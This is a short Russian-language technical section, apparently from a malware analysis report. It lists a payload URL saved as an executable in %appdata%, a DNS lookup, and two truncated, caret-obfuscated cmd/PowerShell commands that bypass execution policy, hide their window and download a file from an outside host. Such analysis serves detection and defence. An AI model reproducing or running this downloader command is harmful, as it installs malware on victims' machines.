Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwers^Hel^L.^EX^E^ -^e^XEC^u^tIO^nPo^LIcy by^Pa^ss -NOP^rO^Fil^e^ -^W^i^nDOWsTyl^e^ hID^Den^ (^NE^w-Ob^JECt Sy^sTEm^.n^E^t.^we^bc^LIen^T)^.D^o^WnloADfile^('http://www.zoerpoled...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POwers^Hel^L.^EX^E^ -^e^XEC^u^tIO^nPo^LIcy by^Pa^ss -NOP^rO^Fil^e^ -^W^i^nDOWsTyl^e^ hID^Den^ (^NE^w-Ob^JECt Sy^sTEm^.n^E^t.^we^bc^LIen^T)^.D^o^WnloADfile^('http://www.zoerpoled...' (со скрытым окном)